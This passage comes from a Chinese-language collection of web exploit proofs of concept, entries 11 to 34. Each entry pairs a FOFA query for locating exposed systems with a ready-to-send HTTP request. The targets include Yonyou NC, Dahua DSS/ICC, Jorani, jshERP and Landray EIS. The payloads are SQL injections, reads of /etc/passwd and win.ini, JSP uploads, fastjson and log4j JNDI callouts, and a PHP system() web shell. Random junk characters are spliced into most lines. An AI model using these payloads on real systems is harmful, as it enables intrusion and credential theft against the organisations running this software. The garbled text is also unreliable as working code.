------WebKitFormBoundaryxdgaqmqu--( ]# P' K0 q6 N, s4 _0 y+ ?
K1 u, W1 k+ q+ i) c, x
2 e0 |0 g: m9 A9 i# |+ x3 {+ v11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入2 G: ]+ B3 v$ `: M: N' F; c! E
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"3 U6 Q! G0 P X* t
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
6 D9 ]" C" W' J) W P: t) JHost: 127.0.0.1
* _$ V9 D4 R" w# k( [& hPragma: no-cache5 H6 Y2 n0 H2 c4 C$ W
Cache-Control: no-cache
$ A: k( A6 h$ EUpgrade-Insecure-Requests: 1. A- Q L/ N: d! `9 T5 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- x9 x W, a3 \/ K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 P9 b1 }! J) F2 i; s% gAccept-Encoding: gzip, deflate* z% X* C. Q$ Z0 R& O$ e
Accept-Language: zh-CN,zh;q=0.9,en;q=0.82 f4 ?2 G: v, l& {$ o6 d
Connection: close$ H6 ?! I$ ~. [7 b: k9 Z4 y
4 O* g! I/ ]* r" N
! {3 p9 g/ y6 D {5 H: W12. Jorani < 1.0.2 远程命令执行
2 z% Q0 |: |6 ?3 AFOFA:title="Jorani"
# W8 u7 C: p H- T3 G4 I+ Y第一步先拿到cookie) T6 p% c, h+ S( @& @% b
GET /session/login HTTP/1.1! v, `1 O- {& u3 B: u; Q% _5 G
Host: 192.168.190.30
9 r9 T) ]- O4 i+ s" [7 A: V0 x; SUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
% X' A) U% I/ v! W! C: F2 l5 y8 {Connection: close
; r9 G2 x0 `5 T* j/ F9 ^* tAccept-Encoding: gzip
0 R% G; F( V' L
9 h- F% \5 _2 Z" r6 e4 c7 B5 s
6 S0 }% ~7 `7 v% S响应中csrf_cookie_jorani用于后续请求
6 B# i# U, `9 ]! y8 M% Z) A* PHTTP/1.1 200 OK$ |" Y3 p7 K/ ]8 g
Connection: close
! K$ b1 q$ {3 o4 A) C, {Cache-Control: no-store, no-cache, must-revalidate8 b, q9 h3 v2 Y8 Z8 T& `
Content-Type: text/html; charset=UTF-8
' g% n+ p. `- x( w" mDate: Tue, 24 Oct 2023 09:34:28 GMT; h9 }$ ]6 J6 d' b" ~! Y3 B A
Expires: Thu, 19 Nov 1981 08:52:00 GMT
2 H4 f/ x: D# q7 E' HLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT' I& i2 K( K% G! I8 H7 f7 \
Pragma: no-cache
Z: Z/ l4 Y* c) n/ e: \4 e( HServer: Apache/2.4.54 (Debian)
8 P: s/ Q" B/ |Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
* R* ]* g1 t: p% P6 w1 fSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly) j/ E) I- c- [# i' N/ L! e. V% x9 m
Vary: Accept-Encoding' b6 F `# j# L9 Q( B. ]
7 J1 F3 Y7 x2 g9 \
" Z7 f1 T$ b) Q& M7 uPOST请求,执行函数并进行base64编码* L+ h" v2 _2 Z' i; B
POST /session/login HTTP/1.1
$ O N: E* `; @) ~! }Host: 192.168.190.30
4 s: l g8 q( VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36/ W5 q u. Y' E
Connection: close$ f. y# h6 J' R1 E
Content-Length: 252+ F3 t, F& n) s
Content-Type: application/x-www-form-urlencoded) Q: k9 e' _) f z5 J+ E( b+ G
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
. U: H) w2 ?: C+ [0 oAccept-Encoding: gzip
+ g0 E+ O: A! R. E3 K. E, Q* t0 B
- C+ K% p9 h fcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
% d' p$ c/ b( c$ }) y n) m) X! p8 F5 f
5 K2 O% }. G( U3 v, s
9 ]6 R& ~. Y" @7 [8 ^" |+ {1 w向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
) G9 ?, J' u* |+ [. N/ DGET /pages/view/log-2023-10-24 HTTP/1.1
& t# V2 v' x5 w C: Z, lHost: 192.168.190.30
9 D( E3 n, Z1 E Q+ a+ C; pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
5 W- g* D+ h: f3 t6 u$ ~- qConnection: close U" M# |' u- I2 r
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r4 j3 H* a! q% |7 I d+ r S2 t
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
+ X$ ^) d' O4 L1 b- c& t0 v1 h: ?: ~X-REQUESTED-WITH: XMLHttpRequest: o- z5 d) C( @+ h' C" z2 r& M2 r
Accept-Encoding: gzip& p, x- K& m" J% I+ {( S+ K
) F2 w4 H0 P6 Z9 H% Q- G4 P2 [: o. {
13. 红帆iOffice ioFileDown任意文件读取
" e1 B6 e; m3 d% b4 Z: @0 X+ F& GFOFA:app="红帆-ioffice"
8 i3 u O/ V- c8 a, cGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1( \, S/ a7 x/ O m0 W# r3 P
Host: x.x.x.x
. o0 X' U% Z8 ~$ c4 I8 RUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36/ q, n# x4 X$ `) z
Connection: close G0 {# o8 }" @% n" v
Accept: */*
; f- P* ]; n8 E7 p) ~' f0 c: O9 kAccept-Encoding: gzip
) f. A. `& b1 l1 ]3 }9 V. W
6 h- r9 A6 r7 ]
+ ?* s% q* E1 C, \# p; d5 _14. 华夏ERP(jshERP)敏感信息泄露
9 j: l6 X/ D qFOFA:body="jshERP-boot": V# m: a! X8 J# W/ |- S
泄露内容包括用户名密码
" n# ~5 t- Q F% uGET /jshERP-boot/user/getAllList;.ico HTTP/1.1# L5 B, Y, g9 D( u; F+ I' `
Host: x.x.x.x
- h! V) }- \$ G% r- R/ f1 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36, M% ~ m( d2 {
Connection: close* W) h4 _( s) x& m
Accept: */*
& w9 z" X: H! G6 ^( h9 Z( gAccept-Language: en1 f; U& w+ W' y \$ B
Accept-Encoding: gzip. y3 @: ]; J% R7 g _) ^, o
* c0 Z6 t0 f. v. {$ B8 |- o4 `" C3 e- |: W4 K
15. 华夏ERP getAllList信息泄露/ s7 j8 f% {: \/ k0 A- K3 z) Z! E
CVE-2024-0490
2 E: z0 |+ m# q5 ]" JFOFA:body="jshERP-boot"
a8 n3 e! h6 h, t' Q( Z泄露内容包括用户名密码
: o6 B4 V& e; _% j ~+ RGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.10 |, L( w! b1 T! v1 }9 r/ a
Host: 192.168.40.130:100
* V0 q- c/ ^5 O1 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36- p$ v9 Q7 z3 c2 s
Connection: close% B( L# I0 ]! j9 X* |6 b9 R, P
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
W1 [1 k) x! W; _2 w: U+ }. `Accept-Language: en
; r% d( F% [) M4 a) p0 K+ E, Hsec-ch-ua-platform: Windows: Y2 x; v( }( ?& ]( O
Accept-Encoding: gzip+ Q1 v1 {% c) }% s
4 ]" J6 B" b# T" T1 x
6 G0 w R/ d/ A6 H- ^/ f
16. 红帆HFOffice医微云SQL注入
0 T/ o) d) C% bFOFA:title="HFOffice"% h5 n* [" c8 p6 ^, H
poc中调用函数计算1234的md5值( V& y1 v+ S# j( i2 Y
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
+ p+ Q9 J7 b+ KHost: x.x.x.x
5 B1 n1 o6 R6 V4 b" w& e4 ?User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36% N: M5 R9 [$ F4 p6 s3 O) T
Connection: close0 X- ^, R& D# Z+ w8 D
Accept: */*: y# {0 E# p5 v( W, t& D
Accept-Language: en
. U; _. e' q; e; l5 O* E3 O1 vAccept-Encoding: gzip/ q0 _2 e! t' o) e. I4 j4 q( t
0 @: \8 X: Z- |9 S# { w; b) ]+ H; z7 X. e6 B0 ]
17. 大华 DSS itcBulletin SQL 注入8 m5 U& d! G) t+ b2 E
FOFA:app="dahua-DSS"
( x- E+ D0 T6 UPOST /portal/services/itcBulletin?wsdl HTTP/1.1
3 C* f1 j4 C# _2 c6 D* _3 ?* ?7 ~Host: x.x.x.x7 p# s1 M$ E9 K6 x$ x7 j" S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; N! \( T* D' q k/ pConnection: close4 u+ K: \* C/ e) U0 s
Content-Length: 345
( z- Z9 `$ [# g6 jAccept-Encoding: gzip: o1 i$ w# i5 N$ i, F* X
6 F( G) W2 k) l! u" Q; h<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
8 W0 F# p' X6 \" w/ T8 ~; _9 R<s11:Body>3 U$ Z3 ?; \$ p: h. O* Y& h8 z
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>9 J3 I! n* t. z% N
<netMarkings>
3 u; R/ P, I% M' P/ l) e (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
( O! }) a7 K5 h; L/ } </netMarkings>1 z9 s n# C5 }# U
</ns1:deleteBulletin>' f- ~) l) b3 K5 s5 S& j2 H
</s11:Body>
7 [# }4 _5 ?% X1 m3 e& }& C</s11:Envelope>+ J2 i* ^2 F- h
1 |; V- k( k3 n4 X
4 N0 I k0 ^: u0 [
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露6 d$ I1 d' I4 [
FOFA:app="dahua-DSS"
; Y/ h1 i4 t: r" w$ WGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
; ~% d2 J; N' c" O7 O+ z0 k) FHost: your-ip
. j e9 Q9 V# k# G) }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; E, K6 v. F; H2 ^- P/ EAccept-Encoding: gzip, deflate
$ |# u# l$ U& q* Q hAccept: */** q4 l) U7 Y! N2 k
Connection: keep-alive, r% }1 B- ]' A1 C" V G% v
) q/ U8 F8 U2 j1 [; ?0 ~$ m2 a) K7 B8 A7 G
( H/ ?% U5 W4 |" p
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入& W }3 e' E4 S
FOFA:app="dahua-DSS"% g+ u8 q7 p; A: Y$ c
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
/ C; p- Z, O( W8 e- lHost:8 `- }( ~( x+ J' A
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
1 s) i: i$ h5 O" H- z6 kAccept-Encoding: gzip, deflate. b& u% b( p; G
Accept: */*. |: n1 q1 v" s+ g
Connection: keep-alive- f1 Y' h9 e: @. r! P
) ?! V% U2 s$ t$ B, q( q" ?+ Q* P4 ]
20. 大华ICC智能物联综合管理平台任意文件读取. M! c9 }6 o3 b4 p5 u- s
FOFA:body="*客户端会小于800*"
. K7 \2 z6 ~! p9 H2 yGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Z6 {% O; ^4 m3 i, z( Z# i7 |Host: x.x.x.x
. A9 U" {5 [! p8 \: z7 {6 _User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- \2 X& s* s9 @; X
Connection: close
( d" p' N2 I& L' @/ t. cAccept: */*
1 F& C+ |+ A. V% b; ?/ o j8 hAccept-Language: en3 o; V/ o- v$ D; D W9 `
Accept-Encoding: gzip
( _' {" h$ X4 c
+ D. C5 H9 r2 A L& I. ~1 N
- Y0 K" X1 e# q* i& s2 Y21. 大华ICC智能物联综合管理平台random远程代码执行3 m, D8 O6 d3 O. G. C& l; F
FOFA:icon_hash="-1935899595"* S* I: P8 d1 l n8 g
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
8 v0 U+ l! U2 T4 JHost: x.x.x.x- l! i$ M- Z2 R( C/ E: S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# v% ?2 n) \- w( AContent-Length: 161+ e9 g1 d0 `! `* S+ H$ W) W
Accept-Encoding: gzip
8 Y( K& A- B# O# w* X EConnection: close# Z$ {: y0 v# p
Content-Type: application/json;charset=utf-8
+ F7 b" M8 e& o
i. w& G/ |6 `4 q( ?{
/ i3 F7 }* O- G2 P8 N$ d"a":{5 @% }2 _4 P" ^+ t+ q3 O
"@type":"com.alibaba.fastjson.JSONObject",/ e# s/ D6 t" P. l3 G3 J
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
$ x: S' l5 R, S/ U* T6 H }""2 E; |+ T: ]9 z( f, d, F9 o" f
}
; I( b9 d* O) Z5 p# S
3 g0 o4 Q \7 S' R: |
3 a% ~. \+ ?4 o: j' ^- {3 Q22. 大华ICC智能物联综合管理平台 log4j远程代码执行, Q2 G: p4 _0 Q( b
FOFA:icon_hash="-1935899595". a4 }! A' g* x1 ~7 q% d
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.12 |9 R1 K2 t, g# k( L. |# o' ^
Host: your-ip3 v7 l" g, G+ o ^9 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
# s1 }: ?+ t$ m, @: B6 UContent-Type: application/json;charset=utf-8 D2 N+ L# C$ Z l! S8 R
; Q+ ^3 c) Q* {3 T# V" j{4 i3 {/ X( a4 J# u' @% S D
"loginName":"${jndi:ldap://dnslog}"
1 p9 K9 w$ x3 }' U}
( X, k" V+ Z4 O3 w" K* P( W+ Z! v1 s( n1 v7 n# W3 `- {
) Q$ |, x& Q0 y1 n9 R F" b. w. ~6 F
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行# m2 N0 Y/ p5 |2 Q5 ]# R
FOFA:icon_hash="-1935899595"' t9 l' f1 {1 [3 }) ?6 U' V
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
. R6 X3 P8 G3 W% n2 xHost: your-ip
6 A: X9 p' K. w0 b8 fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 h) r! L3 T F9 d" c/ ?! bContent-Type: application/json;charset=utf-8" T4 I: V. r9 W' o. `
Accept-Encoding: gzip
( x1 P; r- t* ~) cConnection: close
; h6 f0 `: w& I, k) v. ^7 R3 \1 F3 `; Z
{
! U( q C: g* c" Q" R" d8 d8 h$ w% x" f "a":{
1 A6 S6 U9 S# l. k6 L! u "@type":"com.alibaba.fastjson.JSONObject",
6 l p% H0 P8 V O: J' B+ Z% R8 L {"@type":"java.net.URL","val":"http://DNSLOG"}
1 ?. v4 C6 v, K7 v1 m/ ] }""5 z* W0 F' M! j9 ^
}
& {, ^4 ~5 d# F2 m& v9 t$ {' g# _' q2 e9 |: P( k/ n7 F7 F$ Y
8 ]* U- M( h7 ]* R/ ~( r24. 用友NC 6.5 accept.jsp任意文件上传
3 ]' ?- W* i, P8 a4 p1 IFOFA:icon_hash="1085941792"/ P4 W! e! I8 a
POST /aim/equipmap/accept.jsp HTTP/1.1* g! C6 R3 l( m8 }
Host: x.x.x.x4 Z2 U4 P" T6 w. q# P" `
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.360 u6 N4 _; K" X
Connection: close
i" Z7 S( r/ A% V# l6 `+ K/ eContent-Length: 449 ]- v* h* l% d ~
Accept: */*
\; }3 e# u* w5 u" ?% E+ |Accept-Encoding: gzip
. e! h. R/ ~4 a; I& f$ y/ {Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
1 @4 p- a$ A C9 J: p5 v3 l: v. x) Y$ c9 ^' o
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
S8 f: Y9 Q9 ^( V, ^' }Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
& h# j4 {5 O/ O9 w& k4 eContent-Type: text/plain& p2 n+ }3 p; h2 w- j
5 L. d# E- Q: }+ x' i1 Z' }2 N<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
1 f6 v c5 B) X- H-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
! N9 j6 Q1 v1 m5 }' UContent-Disposition: form-data; name="fname"
/ K( y& i4 Y2 E" T; d }+ |
6 O/ a, s2 F3 `* B\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
7 y: N# S0 L# p0 {+ k0 n-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--7 f0 h5 A6 p$ t; ?+ s6 m
. ]* R7 p7 c3 @+ x) N( S, N8 n2 R: @2 D6 ]
0 b3 y9 J- P8 V- V2 p25. 用友NC registerServlet JNDI 远程代码执行3 o) _, H' H% {1 e/ A) w+ o$ {2 l
FOFA:app="用友-UFIDA-NC"- h# S5 b- ^& t3 P; ?' X2 t& ~0 a
POST /portal/registerServlet HTTP/1.13 n$ v' e5 L4 d, \. F+ S
Host: your-ip/ W/ ] R5 ?6 ]( e$ [3 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0) J( p' P% v% \) q" D3 f1 t- T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9' O5 v+ @6 l. l* |( u+ q/ @
Accept-Encoding: gzip, deflate
) V2 R, W' d9 }& F0 w2 J5 r. TAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
9 q# e7 ^/ r6 M+ GContent-Type: application/x-www-form-urlencoded6 f( W/ z8 g; R, i- @1 D- w
3 |% x5 X6 [+ [- A1 y) q0 p- r4 O
type=1&dsname=ldap://dnslog
& w& Y; H' h0 E; G9 l3 K" |+ A5 {# k9 V# ^. Q5 H! a$ K+ |
' g: U9 Q l+ l4 J3 U3 Y+ D" d" e# R0 \$ l7 _
26. 用友NC linkVoucher SQL注入) g- L+ n/ J% w! F! }! Z$ k; z
FOFA:app="用友-UFIDA-NC"
( O3 _1 X) g" o8 g8 n. G) XGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1! b* _6 \% T) H6 C- H2 W! g
Host: your-ip
8 D5 `0 U( r' q; q' W" v1 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
l' k3 b4 d: Z. dContent-Type: application/x-www-form-urlencoded
/ q. r3 W9 \7 I. F6 g4 yAccept-Encoding: gzip, deflate2 O: N5 ~' ~/ d+ R9 b& g* E* s3 u
Accept: */** X! q' A! Q1 Z/ m
Connection: keep-alive
4 P9 R, ?! l: S# w& X4 f/ l$ J; ^ U1 y ^
# ?+ Y1 I# @# y$ ?27. 用友 NC showcontent SQL注入
( I; z3 e _) TFOFA:icon_hash="1085941792"
- J$ {/ I* L2 p# QGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
1 @" v2 u* [* D) R5 jHost: your-ip
! U, C. k* t+ Q8 V8 a8 ^( rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 v: M" ~6 o3 yAccept-Encoding: identity* x4 Q% d4 i$ R. l/ P/ q8 G7 S! W
Connection: close( R9 u' W5 e9 z2 a4 z3 r
Content-Type: text/xml; charset=utf-8' U: f* A8 t9 M ]% ]
% p" n) f) `" W' q9 T. x" u5 ]$ N7 [2 j" {' E2 q2 [
28. 用友NC grouptemplet 任意文件上传- |) ]: m! q) p, A: X+ y9 [
FOFA:icon_hash="1085941792"3 \- R3 `0 j, P( X, T' z9 k! {; o% A
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
% T/ G8 T" v. J7 Y$ y( u- fHost: x.x.x.x. `* M" A) \: e: D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
7 _1 H- _+ m* }# pConnection: close' f9 C+ }$ N0 @/ z1 Y1 c* m
Content-Length: 268
! I. T1 w; k5 G: k* p8 GContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk8 E$ y. @; T) F* W: l9 o
Accept-Encoding: gzip/ X& ]- f2 X, u/ Q. F/ Q( U
( c; l* Y: ~" k8 }4 u \. ~------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk- c1 \ @, [3 G; O9 Q) e3 x. [2 S; ~
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
3 m' o" j( j& a% `" D* fContent-Type: application/octet-stream0 _/ [9 E5 U( `( F- W5 z
+ i) o' I, ?# l6 C0 j, a<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>) M! f! N# ~" w/ ~9 q0 q
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk-- _8 U) w, B* l8 j
* G7 q1 @5 B1 i' U& X
0 D8 |6 ?1 a) R) J; i/ h& _( O/uapim/static/pages/nc/head.jsp5 G2 ]! B0 T8 U1 ~ H7 r" ^
. ?7 N; t" T% d$ z
29. 用友NC down/bill SQL注入- @+ I$ j4 T; R4 x* |9 x
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
- s1 t6 j( F6 c3 g( LGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1+ o8 ~6 B! K: O- S4 A
Host: your-ip
* U$ J" f! Z7 Z. c) oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( w- }! D3 i4 G% k- ^Content-Type: application/x-www-form-urlencoded
1 U4 b. g6 }+ v4 l; |Accept-Encoding: gzip, deflate
2 U) ?5 b1 p# C% a- n, UAccept: */*
8 [* c$ Y8 }6 c% ^% v$ YConnection: keep-alive
- D$ d2 e) j0 f# o' A
* L" N; I; s7 o' N ]: R9 A2 V+ _. F5 S2 J
30. 用友NC importPml SQL注入0 Q, Q$ A0 E& Q
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif" _! m6 f3 x7 _8 k Y0 e+ v
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
6 N' i8 K! z) X$ d" m# XHost: your-ip
. \& m( M" z k, mContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V$ ]+ d) Q: w$ R- t0 b" u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+ X" `# t) n1 w+ MConnection: close
- b L( ^9 A2 _ R4 L0 ^! `( X- q% u6 l7 Z
------WebKitFormBoundaryH970hbttBhoCyj9V3 u& D9 g9 @3 [ ^
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
) ]. u, ?. f3 A) k2 bContent-Type: image/jpeg
' E8 Y2 p, o- d( {------WebKitFormBoundaryH970hbttBhoCyj9V--
# C$ g5 ^ \! M
7 W2 g! h% y- q
9 T9 [9 N. D3 A+ L31. 用友NC runStateServlet SQL注入
4 e L2 c" L; E9 ^version<=6.5
' ~' ^. v3 S4 Y+ T0 PFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
$ `7 d: N4 a$ Q @ d: DGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
7 F3 R) t) x& rHost: host6 Y3 A- o3 n6 y$ c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
! P' g4 {* l: s; SContent-Type: application/x-www-form-urlencoded- A/ s. H, ]' Z' D* b0 [" ]
6 J+ N/ M; x# f7 J8 T
. ~! ]$ l$ B& y32. 用友NC complainbilldetail SQL注入
7 R- { K+ q7 q* z" K9 Qversion= NC633、NC657 l6 ^: X0 l; e
FOFA:app="用友-UFIDA-NC": Y5 w6 \8 F" x; t7 x
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1& A" e2 w% a7 G& E' N& e6 A0 n
Host: your-ip
2 q* G! T8 p+ k: G4 t% Y9 i& RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( |6 ]1 M- N3 j: W0 W3 `
Content-Type: application/x-www-form-urlencoded
4 I9 b7 W. ^0 E5 n, s& @2 V. UAccept-Encoding: gzip, deflate. e5 d6 ~) J. c+ P# [: O
Accept: */*
1 _, ~3 A; V' S% l9 H8 l* nConnection: keep-alive
3 r: F' e) Z! F8 i% C' d( M. ]
5 n- p7 S, T# r8 z. B+ x
33. 用友NC downTax/download SQL注入
\' B% W% Y, q/ l2 }( S6 `- Nversion:NC6.5FOFA:app="用友-UFIDA-NC"
2 z5 a8 J3 N* w' Z b6 CGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.17 M1 F* t& x' r( P- Y" L1 ]. h3 L
Host: your-ip
! F# c3 v. R- J+ t5 T. H3 \) AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* ?; j/ V* a% w# A5 RContent-Type: application/x-www-form-urlencoded5 s- X/ b' v7 v. m
Accept-Encoding: gzip, deflate; y6 C3 g) M/ U$ Y3 K5 }+ p
Accept: */*, J' q% m5 @2 O
Connection: keep-alive! a1 K1 Q& f& u
( }2 H! C1 v9 g+ J- v) B) ^8 P" ~8 r& s3 V1 I
34. 用友NC warningDetailInfo接口SQL注入
# O2 o$ y+ P& D/ x! r) _8 S0 KFOFA:app="用友-UFIDA-NC"8 k4 d2 M$ U1 N% Y- W+ ?1 x
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
4 F" e6 P* `# r) {. tHost: your-ip
% J) b3 c: x. HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 \( [( Z8 W+ X) a, ^
Content-Type: application/x-www-form-urlencoded) h4 D7 J3 h9 n% ]: a/ ]
Accept-Encoding: gzip, deflate
1 B8 H4 \/ r3 P- {Accept: */*
